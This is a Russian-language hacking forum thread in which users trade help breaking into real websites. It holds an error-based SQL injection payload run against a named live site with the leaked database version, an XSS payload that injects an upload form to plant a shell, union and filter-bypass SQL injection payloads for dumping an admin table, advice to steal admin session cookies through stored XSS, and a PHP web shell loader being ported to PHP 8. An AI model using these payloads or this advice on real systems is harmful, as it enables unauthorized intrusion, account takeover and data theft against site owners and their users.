Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Apache or Nginx?

    Версия довольна старая. Если есть маломальский доступ внутрь, то вариантов должна быть куча. Из проверенного старья, можно что-то посмотреть здесь https://rdot.org/forum/showthread.php?t=286


    Думаю, что ничего интересного.
     
    fandor9 and Suicide like this.
  2. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    Apache
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    This exploit can be modified, but requires low level skills. Unfortunately, I haven't seen any simple bypasses.
     
    eminlayer7788 and fandor9 like this.
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    помогите раскрутить
    Code:
    https://www.egtexpress.com/ru/country/slovinsko"/
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Code:
    /ru/country/slovinsko"and(extractvalue(1,concat(0x3a,(select@@version))))="1/
    Code:
    XPATH syntax error: ':10.0.35-MariaDB
     
    _________________________
  6. dread3nergy

    dread3nergy New Member

    Joined:
    23 May 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте , я тут недавно , по этому если обращаюсь не в ту тему , прошу не кидать ссаны тряпками , а вросто отправить на поиски в нужном направлении.
    Поиск по форуму моего вопроса показал мне пустую страницу , по этому задам вопрос тут.

    Подскажите пожалуйста , где можно на русском языке найти информацию по IMP4GT ?
    Само собой интересует не статьи о том насколько это страшно, а реальная информация , прежде всего какой необходим инструментарий для реализации. Если информации на великомогучем нет , подойдут и буржуйские источники.
    Заранее спасибо.
     
  7. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Ну на сайте стоит что использовался стек srsLTE, ну и к тому же понадобится как минимум SDR который работает на частотах LTE (например limeSDR), хотя конкретно они использовали 2х Ettus USRP B210 (глава V.Setup)
     
    BigBear and 174region174 like this.
  8. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    nope
     
    eminlayer7788 likes this.
  9. signlog

    signlog New Member

    Joined:
    10 Jun 2022
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет, я только начинающий и тема вся эта интересна не в корыстных целях. Буду признателен за помощь.

    Нашёл уязвимость на сайте своего друга, следующего вида:
    Code:
    Text' -->">'>'"
    Данную уязвимость нашел в профиле, т.е. сделал вход в аккаунт-> перешел в редактировать профиль и в любой их строг, будь то логин, город, имя - вводиться данные строки.

    На выходе получаю:
    [​IMG]

    Далее начал развивать тему загрузки шелла, подгрузил кнопку загрузки:
    Code:
    New York' -->"><form method="POST" action="https://sitefriends" enctype="multipart/form-data" >
    <input type="file" name="Filedata"></center><br>
    <input type="submit" name="Submit" value="Upload">
    </form>'>'"
    Выбираю файл, нажимаю Upload (загрузка файла, в не зависимости какой, хоть картинку), форма загрузки пропадает и все, далее ничего нет. загрузился ли файл не известно, по пути пытался пройти не нашел.

    Куда копать и возможно ли как то по другому загрузить шелл или получить данные базы данных.
     
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    Hi
    See what the status code in response with burp suite
     
  11. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202

    одной формы загрузки мало, у формы должен быть загрузчик, ты указал в поле action адрес, выходит логика такая что твоя форма отсылает на "морду" файл, но если в исходнике нет обработчика то ничего не произойдет. Судя по всему там хранимая XSS которую можно подсунуть админу и попробовать украсть куки авторизации и попасть в админку, либо сменить вектор атаки и попробовать найти в данных полях формы SQL INJ
     
    crlf likes this.
  12. FireRidlle

    FireRidlle Member

    Joined:
    7 Jul 2009
    Messages:
    37
    Likes Received:
    5
    Reputations:
    3
    есть уязвимый параметр в body payload для post запроса, но не могу понять как использовать union select. при ошибки синтаксиса, я ее не вижу, но в таком случае возвращается пустая страница

    возвращает полностью все с таблицы
    Code:
    month=8&year=2022 or 1=1  -- - 
    возвращает пустую страницу => ошибка
    Code:
    month=8&year=2022 order by 2  -- - 

    возвращает разметку. значит в запросе 1 колонка
    Code:
    month=8&year=2022 order by 1  -- - 

    пытаюсь сделать union based атаку. пустая страница => ошибка
    Code:
    month=8&year=2022 union select 1 -- - 
    поле которое есть в основном запросе это id, потому что такой запрос проходит
    Code:
    month=8&year=2022 order by id -- - 
    скорей всего это подзапрос, или результат передается в другой

    используя технику с сравнением ascii могу достать данные, но это очень долго. есть возможность как то внедрить union select?
     
    #2972 FireRidlle, 15 Aug 2022
    Last edited: 15 Aug 2022
  13. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    sqlmap
     
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
  15. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть Open Redirect там же xss

    site.com/login?next=asdfg

    в ответ получаю

    Location: asdfg

    <p>Found. Redirecting to <a href="asdfg">asdfg</a></p>

    Принимает javascript:alert() но Location все портит, нужно этот Redirect сломать что бы все сработало.
    Пробовал варианты из таблицы https://habr.com/ru/company/pt/blog/247709/ но редирект даже если не происходит ответ мне не показывает.
    Есть что то актуальное?
     
  16. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Подскажите по web шеллу, как вернее его будет поправить для php8?
    PHP:
    $j___wp=create_function('',$j__wp);unset($j_wp,$j__wp);$j___wp();
    А то с этим create_function((
     
  17. FireRidlle

    FireRidlle Member

    Joined:
    7 Jul 2009
    Messages:
    37
    Likes Received:
    5
    Reputations:
    3
    есть таблица admin.
    запрос select column_name from information_schema.columns where table_name='admin' limit 1 -> 500 ошибка
    запрос select column_name from information_schema.columns where table_name=concat('ad', 'min') limit 1 -> проходит

    есть способы как достать данные с таблицы когда в url встречается слово admin, то всегда 500 ошибка?
    пробовал в разном регистре писать, не помогает
     
    #2977 FireRidlle, 4 Sep 2022
    Last edited: 4 Sep 2022
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Почитать, например.

    https://forum.antichat.com/threads/104591/


    Вопрос №4 Не могу вывести данные (Вытекает из предыдущего)
    table_name='users' Ошибка
    Скорее всего magic_quotes_gpc = On , и соответственно кавычки слешируются
    И снова целых 2 варианта.
    Перевести название таблицы/колонки в hex или в CHAR, кому как нравится
    Для hex это выглядит так(добавляем к hex впереди 0x что-бы база поняла, что за данные мы ей втюхиваем):
    union+select+1,table_rows+from+information_schema.tables+where+table_name=0x7573657273
    для CHAR так:
    union+select+1,table_rows+from+information_schema.tables+where+table_name=char(117,115,101,114,115)
    Как видим обошлись без кавычек (сдесь table_name=users)
    Некоторые индивидумы умудряются загонять в хекс или чар вместе с кавычками, тоесть так 'users'=27757365727327, так делать ненадо, база этого не оценит )
     
    _________________________
    FireRidlle likes this.
  19. FireRidlle

    FireRidlle Member

    Joined:
    7 Jul 2009
    Messages:
    37
    Likes Received:
    5
    Reputations:
    3
    спасибо, но я написал что вытащить колонку получилось через конкатенации. проблема в том что бы достать данные из самой таблицы admin, то есть select username,pass from admin
     
  20. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25